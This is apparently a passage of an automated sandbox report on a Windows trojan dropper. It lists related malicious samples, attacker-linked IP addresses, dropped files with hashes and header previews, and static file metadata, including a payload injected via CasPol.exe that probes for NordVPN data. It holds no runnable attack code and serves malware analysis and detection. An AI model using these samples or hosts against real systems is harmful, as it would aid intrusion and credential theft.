                                Tq9MQmwr7p.exeGet hashmaliciousBrowse
                                • 45.10.148.33

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                ROOTLAYERNETNLSecuriteInfo.com.Trojan.Inject.3564.exeGet hashmaliciousBrowse
                                • 185.222.57.79
                                SecuriteInfo.com.Variant.Strictor.272916.17678.exeGet hashmaliciousBrowse
                                • 45.137.22.35
                                RFQ - FYKS - 06052022.exeGet hashmaliciousBrowse
                                • 185.222.58.90
                                MZvvoqAUnu.exeGet hashmaliciousBrowse
                                • 45.137.22.35
                                MACHINE SPECIFICATIONS.exeGet hashmaliciousBrowse
                                • 185.222.58.90
                                MACHINE SPECIFICATIONS.exeGet hashmaliciousBrowse
                                • 185.222.58.90
                                New Order.exeGet hashmaliciousBrowse
                                • 185.222.57.178
                                e_Receipt.pdf.exeGet hashmaliciousBrowse
                                • 45.137.22.163
                                View Payment.exeGet hashmaliciousBrowse
                                • 45.137.22.35
                                SecuriteInfo.com.Variant.Babar.54324.15185.exeGet hashmaliciousBrowse
                                • 185.222.57.79
                                PAYMENT.exeGet hashmaliciousBrowse
                                • 185.222.58.237
                                Payment.exeGet hashmaliciousBrowse
                                • 45.137.22.122
                                Quotation.xlsxGet hashmaliciousBrowse
                                • 185.222.58.51
                                Order Package.xlsxGet hashmaliciousBrowse
                                • 185.222.58.244
                                ORDER SV-033764.exeGet hashmaliciousBrowse
                                • 185.222.57.155
                                ORDER_SV-033764.exeGet hashmaliciousBrowse
                                • 185.222.57.155
                                ORDER SV-033764.exeGet hashmaliciousBrowse
                                • 185.222.57.155
                                ORDER SV-033764.exeGet hashmaliciousBrowse
                                • 185.222.57.155
                                Hzb1l180P6.exeGet hashmaliciousBrowse
                                • 45.137.22.227
                                bankreportt.exeGet hashmaliciousBrowse
                                • 185.222.57.252
                                EKSENBILISIMTRTq9MQmwr7p.exeGet hashmaliciousBrowse
                                • 45.10.148.33
                                202203247388883439333.exeGet hashmaliciousBrowse
                                • 45.10.148.50
                                20220323_6637267327263723.exeGet hashmaliciousBrowse
                                • 45.10.148.50
                                ORDER 131-004.exeGet hashmaliciousBrowse
                                • 45.10.148.50
                                5K9q55OzDuGet hashmaliciousBrowse
                                • 193.57.27.161
                                Linux_amd64Get hashmaliciousBrowse
                                • 45.10.148.177
                                5PfBAmWq3V.exeGet hashmaliciousBrowse
                                • 147.78.3.216
                                QUOTE B1020363.PDF.exeGet hashmaliciousBrowse
                                • 45.92.107.71

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                C:\Users\user\AppData\Local\Temp\ThrottlePlugin.dllSecuriteInfo.com.Trojan.Inject.11626.exeGet hashmaliciousBrowse
                                  SecuriteInfo.com.Trojan.Inject.3564.exeGet hashmaliciousBrowse
                                    SecuriteInfo.com.Trojan.Inject.3564.exeGet hashmaliciousBrowse
                                      shipping document.exeGet hashmaliciousBrowse
                                        shipping document.exeGet hashmaliciousBrowse
                                          C:\Users\user\AppData\Local\Temp\nsg40B0.tmp\System.dllSecuriteInfo.com.Trojan.Inject.11626.exeGet hashmaliciousBrowse
                                            SecuriteInfo.com.Trojan.Inject.3564.exeGet hashmaliciousBrowse
                                              SecuriteInfo.com.Trojan.Inject.3564.exeGet hashmaliciousBrowse
                                                recibo.exeGet hashmaliciousBrowse
                                                  recibo.exeGet hashmaliciousBrowse
                                                    #confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xlsGet hashmaliciousBrowse
                                                      SecuriteInfo.com.W32.AIDetect.malware2.5627.exeGet hashmaliciousBrowse
                                                        SecuriteInfo.com.W32.AIDetect.malware2.5627.exeGet hashmaliciousBrowse
                                                          SecuriteInfo.com.Variant.FakeAlert.2.24488.exeGet hashmaliciousBrowse
                                                            SecuriteInfo.com.W32.AIDetect.malware2.23037.exeGet hashmaliciousBrowse
                                                              SecuriteInfo.com.W32.AIDetect.malware2.23037.exeGet hashmaliciousBrowse
                                                                SecuriteInfo.com.Trojan.Siggen17.57062.9420.exeGet hashmaliciousBrowse
                                                                  SecuriteInfo.com.Trojan.Siggen17.57062.9420.exeGet hashmaliciousBrowse
                                                                    SecuriteInfo.com.W32.AIDetect.malware2.20966.exeGet hashmaliciousBrowse
                                                                      SecuriteInfo.com.W32.AIDetect.malware2.20966.exeGet hashmaliciousBrowse
                                                                        SecuriteInfo.com.generic.ml.22865.exeGet hashmaliciousBrowse
                                                                          SecuriteInfo.com.generic.ml.22865.exeGet hashmaliciousBrowse
                                                                            SecuriteInfo.com.Gen.Variant.Nemesis.7115.16481.exeGet hashmaliciousBrowse
                                                                              SCAN Swift 054545676700000000000000001.exeGet hashmaliciousBrowse
                                                                                SCAN Swift 054545676700000000000000001.exeGet hashmaliciousBrowse

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\Local\Temp\CYKELPARKERINGENS.ini

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):43
                                                                                  Entropy (8bit):4.693479289485192
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:JODb6MHIymy32ov:Jebozyn
                                                                                  MD5:8B36E2227A5BD0472C64194B43581D90
                                                                                  SHA1:E391FCABCE78C902A95B2B3A90F46380AA0E6031
                                                                                  SHA-256:7A5D1B27408729909236B8B98CD3D19002750B7297981F32A6E6DD743B16BFB4
                                                                                  SHA-512:FE426325981C65C37C16AE8021B2D8EDB50009743DC54C3EA2F496CA020BB980BCC43D70F5A2498A2AB8315183F5D2437DB72CCE69698978D927FA0E25DB1375
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:[Vddelber60]..Paxilla=EKSKOMMUNIKATIONERS..

                                                                                  C:\Users\user\AppData\Local\Temp\GL-1.0.typelib

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe
                                                                                  File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1245
                                                                                  Entropy (8bit):5.462849750105637
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
                                                                                  MD5:5343C1A8B203C162A3BF3870D9F50FD4
                                                                                  SHA1:04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
                                                                                  SHA-256:DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
                                                                                  SHA-512:E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
                                                                                  Malicious:false
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co

                                                                                  C:\Users\user\AppData\Local\Temp\HERMAPHRODEITY.ini

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):40
                                                                                  Entropy (8bit):4.412814895472355
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:bAL2Wlv3AhWuvU2:bu2gYEd2
                                                                                  MD5:176F3A8631F14F0421935D07502B8CD9
                                                                                  SHA1:70C91B54BDE9BA107AB322ECACF16C60E0D8E57B
                                                                                  SHA-256:F507F6BB14F286DD6835A18FC9ECDB86F73DBA96E9E281D626718447F1C496BB
                                                                                  SHA-512:CC963E6BD3577D12FAC185D3D61CCC72098C52E5F2E907E5724BA7BC9FF022A2E74D0DF18D82AD7EC645FEE9328458B7493B1BDD7F1216A677A42F8516568336
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:[Godgrendes]..Resipiscence=Mightily197..

                                                                                  C:\Users\user\AppData\Local\Temp\ThrottlePlugin.dll

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe
                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):380640
                                                                                  Entropy (8bit):6.00755593352656
                                                                                  Encrypted:false
                                                                                  SSDEEP:6144:tqpZKqQPNb5tPcACMBdK99Uf2o7nypI83l4tHY1706ePrz2lxf:tqEvcA49Ro7R64Pi
                                                                                  MD5:07B4E869E84B557512EE38A5C283FEF3
                                                                                  SHA1:85AFD748ACB7DB97C763ABFEA292E8543B084517
                                                                                  SHA-256:C718B6BF9A427A117FFC1AB1C0E02551AFB2675406BAC625534E02179DB12C9D
                                                                                  SHA-512:C1E7E9781B538D6FD1265DF135606483DCC80B190FFB6DE6C9A7C4DD83B2B4453C746FE7C4E4AE577BE5DD40D4BB98BE8D0325119148D81D8D3CD094E92606E7
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: SecuriteInfo.com.Trojan.Inject.11626.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.Trojan.Inject.3564.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.Trojan.Inject.3564.exe, Detection: malicious, Browse
                                                                                  • Filename: shipping document.exe, Detection: malicious, Browse
                                                                                  • Filename: shipping document.exe, Detection: malicious, Browse
                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.........EK..+...+...+......+...*...+.......+.../...+...(...+.$.*...+...,...+...-...+...*...+...*...+.$.....+.$.+...+.$.....+.......+.$.)...+.Rich..+.........................PE..d...W6;a.........." .........2......$y....................................... .......P....`.........................................pK..T....K..0.......p........!......................T......................(......................h............................text...<........................... ..`.rdata.. ...........................@..@.data....%...........~..............@....pdata...!......."..................@..@.rsrc...p...........................@..@.reloc..............................@..B........................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\Waxiness.Sym

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):133983
                                                                                  Entropy (8bit):4.053356129693858
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:0aDhpwRpeoT7/pL9vWX8iQC21Jl4YULhmlxv:0aTWeoT7/YUyVhmxv
                                                                                  MD5:B364DBDF5A8A0C58CD4B721BE9432C48
                                                                                  SHA1:B4159BD48769E110F77AC738B411ABFB73BE5A16
                                                                                  SHA-256:1EE1B8AE17CE30ACC1DCC52DD1B0B569BB336E8D2E67E5DAC944B2D3DE4F0762
                                                                                  SHA-512:CFE74620FF111A58B53BF6A495649F556E655C87BA3A4574346975D9A17D52F7140EB0DA76DBFA0D8CD33EE9525674B8BEBCF8E08CD833D66BBFA9229804978B
                                                                                  Malicious:false
                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\applications-other.png

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe
                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                  Category:dropped
                                                                                  Size (bytes):685
                                                                                  Entropy (8bit):7.621282940093077
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:6v/7U+KyobNKxqUPO9/qRw6l2ZK2zirFLDbFJXy+MAg+eElsD8itXaBdHjGGrOKF:N+KyobksUVRqK2+LX/zlsYR3HjGCbx
                                                                                  MD5:8C4F73C63672801A4629BA32BFAF9E31
                                                                                  SHA1:C59877FEA56A2D45E36389366B0CCBC0AC2B720B
                                                                                  SHA-256:DFAFC0CCDCD4A2B74B8F74ECBE0BE82FC9FF3D055A8C9585DD78379DB7F01063
                                                                                  SHA-512:E4479DFE6F342212DA86B0B4BE1095162F07F7AE98AC1921CC9ED7BB650E7024CF80D1A82EA99D3744C9127FA046E82C81D4D82D17152D868DD7D1D78ACE20E5
                                                                                  Malicious:false
                                                                                  Preview:.PNG........IHDR................a...tIDATx.....ki.G.....pm.........c.m.v.....uNr...O......"....\.B.......q.J......|.^^^......g....6..^..NV(..../.wAIi.n.,,.....A~k....5....YwdS.........O/.s.9.k..|v.d......<F.F......z.9 CDn.IzeS.^.w.).V.0.?.._.-.........p?......A.KV..}r...M......<..p......h.hEGg+.Z.$.jx7}LN....,....+...`..-N.6.8....T.T.r.zH.?...@.X...L......fgg..{...........EQq....n.G..{65<.cD)d>.c..V}r.>z.S.D"...[.p.M.4>|.3|..7..j8:.@..5.s.P...N..P..Vi8..<3.g.5...hO..-d..Z.,..........A.Yc..3.5|.Nk.......I.7.*..a..x....2R......sn..0..2...o....Q.)<A..M......%`....P...Q.w. ..G.ggr.F..O5.`.5.(g...7......3l.-d..,..1F..[t.l9.g..FX........IEND.B`.

                                                                                  C:\Users\user\AppData\Local\Temp\folder-symbolic.symbolic.png

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe
                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                  Category:dropped
                                                                                  Size (bytes):166
                                                                                  Entropy (8bit):5.876785121167948
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:yionv//thPl9vt3lAnsrtxBllZMFnt4UoEw2GUqcklEj9h0XGqV/maXyj2fllljp:6v/lhPysLEnt4UoEwsqckGpq6jy/jp
                                                                                  MD5:A008C1D205C5B08639C0A8D8673C6C72
                                                                                  SHA1:5190570B97A6F75F1D10D3D1EC6E46AEC8705B0B
                                                                                  SHA-256:54A3EBAD22462339574D87D835CA626E039E9B38A625806BAA051F80A327C428
                                                                                  SHA-512:AC5F3ED7773C04223650B757F6168FA4F6C57BA4F0C073BD5AB933B96F0FC3AEE918543C4AEA703A9F472045C6FC5CEA012935850F2971A8107772B96F341AB5
                                                                                  Malicious:false
                                                                                  Preview:.PNG........IHDR................a....sBIT....|.d....]IDAT8.c`..8......>... F...4..u...IJ.....43B.......!..X.D.&rl.5...<...IPO......R..3...W......o2...M`....IEND.B`.

                                                                                  C:\Users\user\AppData\Local\Temp\nsg40B0.tmp\System.dll

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe
                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):12288
                                                                                  Entropy (8bit):5.814115788739565
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                                                  MD5:CFF85C549D536F651D4FB8387F1976F2
                                                                                  SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                                                  SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                                                                  SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Joe Sandbox View:
                                                                                  • Filename: SecuriteInfo.com.Trojan.Inject.11626.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.Trojan.Inject.3564.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.Trojan.Inject.3564.exe, Detection: malicious, Browse
                                                                                  • Filename: recibo.exe, Detection: malicious, Browse
                                                                                  • Filename: recibo.exe, Detection: malicious, Browse
                                                                                  • Filename: #confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.W32.AIDetect.malware2.5627.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.Trojan.Siggen17.57062.9420.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.W32.AIDetect.malware2.20966.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.W32.AIDetect.malware2.20966.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.generic.ml.22865.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.generic.ml.22865.exe, Detection: malicious, Browse
                                                                                  • Filename: SecuriteInfo.com.Gen.Variant.Nemesis.7115.16481.exe, Detection: malicious, Browse
                                                                                  • Filename: SCAN Swift 054545676700000000000000001.exe, Detection: malicious, Browse
                                                                                  • Filename: SCAN Swift 054545676700000000000000001.exe, Detection: malicious, Browse
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\rt64win7.inf

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe
                                                                                  File Type:Windows setup INFormation, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1292652
                                                                                  Entropy (8bit):3.864768543104337
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:veHaqq95T1TpRKkYxyZuSkIRipOp1MbSqh43FFc23lRxSsopQfql1Ody29kn1jYF:XaekadZaJiaeQMV
                                                                                  MD5:2D947C4C9147622CFC588FC5C17DDDEC
                                                                                  SHA1:B367B48D1282E39E37B8992615FF9947DEE8CFED
                                                                                  SHA-256:EBB8155AC71DD53258CE3772F189B4771272BA55E15A6DABDE2BEA6896DC2CC3
                                                                                  SHA-512:3213B423153A1350AA3A0213079EDF21D77022C7839EB3A905F7EE8A02028E6A572499223889A55C2EF4646C0D3B2CB6DC64E1DCCEF26053EF80D34313EAD885
                                                                                  Malicious:false
                                                                                  Preview:..;. .*.*. .C.O.P.Y.R.I.G.H.T. .(.C.). .2.0.0.7.-.2.0.1.3. .R.e.a.l.t.e.k. .C.O.R.P.O.R.A.T.I.O.N.....;.....;. .R.e.a.l.t.e.k. .P.C.I.e. .F.E. .F.a.m.i.l.y. .C.o.n.t.r.o.l.l.e.r.....;. .R.e.a.l.t.e.k. .P.C.I. .G.B.E. .F.a.m.i.l.y. .C.o.n.t.r.o.l.l.e.r.....;. .R.e.a.l.t.e.k. .P.C.I.e. .G.B.E. .F.a.m.i.l.y. .C.o.n.t.r.o.l.l.e.r.....;.........[.v.e.r.s.i.o.n.].....S.i.g.n.a.t.u.r.e. . . .=. .".$.W.i.n.d.o.w.s. .N.T.$.".....C.l.a.s.s. . . . . . . .=. .N.e.t.....C.l.a.s.s.G.U.I.D. . . .=. .{.4.d.3.6.e.9.7.2.-.e.3.2.5.-.1.1.c.e.-.b.f.c.1.-.0.8.0.0.2.b.e.1.0.3.1.8.}.....P.r.o.v.i.d.e.r. . . . .=. .%.R.e.a.l.t.e.k.%.....D.r.i.v.e.r.V.e.r. . . .=. .0.4./.1.0./.2.0.1.3.,.7...0.7.2...0.4.1.0...2.0.1.3.....C.a.t.a.l.o.g.F.i.l.e...N.T. .=. .r.t.6.4.w.i.n.7...c.a.t.........[.M.a.n.u.f.a.c.t.u.r.e.r.].....%.R.e.a.l.t.e.k.%.=.R.e.a.l.t.e.k.,. .N.T.a.m.d.6.4.........[.C.o.n.t.r.o.l.F.l.a.g.s.].....E.x.c.l.u.d.e.F.r.o.m.S.e.l.e.c.t. . . . . .=. .*.............[.R.e.a.l.t.e.k...N.T.a.m.d.6.4.].....;. .8.

                                                                                  C:\Users\user\AppData\Local\Temp\subfolder1\FRATERNATE.exe

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):658225
                                                                                  Entropy (8bit):6.793682843563435
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:rYgT387AbTc/v4b0h2gdYBXnQLGT/Fp0hZAvcG0ePzNSd01RHqtZCCNfn6THbMcR:rYgo7AbTc/v4b0h2gqBXnQLGT/Fp0hZO
                                                                                  MD5:D7C874B7667F0A6AA61D8BB8D7FB680C
                                                                                  SHA1:FC84BD96DEEC372BF30F2EAE236B51F7706E55A8
                                                                                  SHA-256:B7F3A9793A8251532790A42CEDE3351935CCFD8B0AE26A4019956D644269B8EB
                                                                                  SHA-512:68C0C7E5F23B9557C669E7808D8350A6F08409CE98E37FA3303DBA6B69BACCB9419E6070F46C3BBF826E2136874FCAC4FE4C294F2FDA5F6F98FCA041E75E3AF6
                                                                                  Malicious:false
                                                                                  Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*......@6............@..........................`............@.......................................... ..8=...........................................................................................................text...vf.......h.................. ..`.rdata...............l..............@..@.data...x...........................@....ndata...p...............................rsrc...8=... ...>..................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\user-not-tracked-symbolic.svg

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe
                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                  Category:dropped
                                                                                  Size (bytes):4730
                                                                                  Entropy (8bit):4.970880293743837
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:VkoIankPYfLoIJomlXTlUxSHtuubQLqJlm0mxmOmTGmVm/mYmY:VkfcMI64RfIubQW/BEjPoKlp
                                                                                  MD5:8F7C767AFA41E6D03BDE59296DFF8175
                                                                                  SHA1:EEFA541D3A06CAFEB62A535B86D1A95D6AAE1CD6
                                                                                  SHA-256:292770B23ED69AF4EDE9255BB66ADF3D3A0FF62D827D2BA05ED2C44A57228ED6
                                                                                  SHA-512:FFE75CCD2EFFA74E24955BF36DBD86BB1B30F880D233D8F5C5431E99169224E89E7C59FDD052C6F9544E05CF11FD425F01ADD6E87B512C318132D963CB338B04
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.<svg. xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:cc="http://creativecommons.org/ns#". xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#". xmlns:svg="http://www.w3.org/2000/svg". xmlns="http://www.w3.org/2000/svg". width="16". version="1.1". style="enable-background:new". id="svg7384". height="16.000645">. <metadata. id="metadata90">. <rdf:RDF>. <cc:Work. rdf:about="">. <dc:format>image/svg+xml</dc:format>. <dc:type. rdf:resource="http://purl.org/dc/dcmitype/StillImage" />. <dc:title>Gnome Symbolic Icons</dc:title>. <cc:license. rdf:resource="http://creativecommons.org/licenses/by-sa/4.0/" />. </cc:Work>. <cc:License. rdf:about="http://creativecommons.org/licenses/by-sa/4.0/">. <cc:permits. rdf:resource="http://creativecommons.org/ns#Reproduction" />. <cc:permits. rdf:resource="htt

                                                                                  C:\Users\user\AppData\Local\Temp\video-joined-displays-symbolic.symbolic.png

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject.11626.exe
                                                                                  File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                  Category:dropped
                                                                                  Size (bytes):208
                                                                                  Entropy (8bit):6.572781220141588
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:yionv//thPl9vt3lAnsrtxBllUxPFp/7l04sR5/7dY+MK6Ie+ed0oxIwsoazRC4I:6v/lhPysIzlZsfdY+MKda8RC4KymCeVp
                                                                                  MD5:E2FC23D36F5488D1F2888D524F933582
                                                                                  SHA1:335CA8F69FF42E4418F0C95A9626F7B027F62139
                                                                                  SHA-256:07AEFFEAC02CD1501C54E5D66ED1816B83AF04E51B1676AF3C4A538FDC9E9E4A
                                                                                  SHA-512:EA3B15A24F8B3FF83DE6ABB7392A0672A55F1F87DDC485B2AD517E76B48358C852484CF2D23FD7989992676AF73640D6CC2002FD2F0FD2EAA29C39C7DFE503BA
                                                                                  Malicious:false
                                                                                  Preview:.PNG........IHDR................a....sBIT....|.d.....IDAT8..1.. .E..@v....P...........8.O.......w4@.8`..I.I....0...&y..../9..r....5..@....P.+..l..*..8..~...@....p...y.#0)....o...fq....>....S.^&.n....IEND.B`.

                                                                                  \Device\ConDrv

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):30
                                                                                  Entropy (8bit):3.964735178725505
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                                                                  MD5:9F754B47B351EF0FC32527B541420595
                                                                                  SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                                                                  SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                                                                  SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                                                                  Malicious:false
                                                                                  Preview:NordVPN directory not found!..

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                  Entropy (8bit):6.793691216814324
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:SecuriteInfo.com.Trojan.Inject.11626.exe
                                                                                  File size:658225
                                                                                  MD5:dd43bd8cdc55dd9c8a168f7d5e67db30
                                                                                  SHA1:b7b49d8b277b6cb3d3006e912ad78558872119fb
                                                                                  SHA256:7dc00d4ca525d39db7c57bcbcf2a17720f3e1d2eaecfc714f5e28f0e2a09633b
                                                                                  SHA512:445e59a9fd2b4a0361772e6865866aee8511e583c0771b16c8e48d32940eecafa2baa05645fd5b5e4b0f75d78f57e6548304b04be241cc25dead38c4a77583ae
                                                                                  SSDEEP:12288:0YgT387AbTc/v4b0h2gdYBXnQLGT/Fp0hZAvcG0ePzNSd01RHqtZCCNfn6THbMcR:0Ygo7AbTc/v4b0h2gqBXnQLGT/Fp0hZO
                                                                                  TLSH:66E418B2A130868AD5E91EF25E5AB93091B22C7CDCE2110DA9F6370DD6F231145DEB4F
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....

                                                                                  File Icon

                                                                                  Icon Hash:ac9eb23233b28eaa

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x403640
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
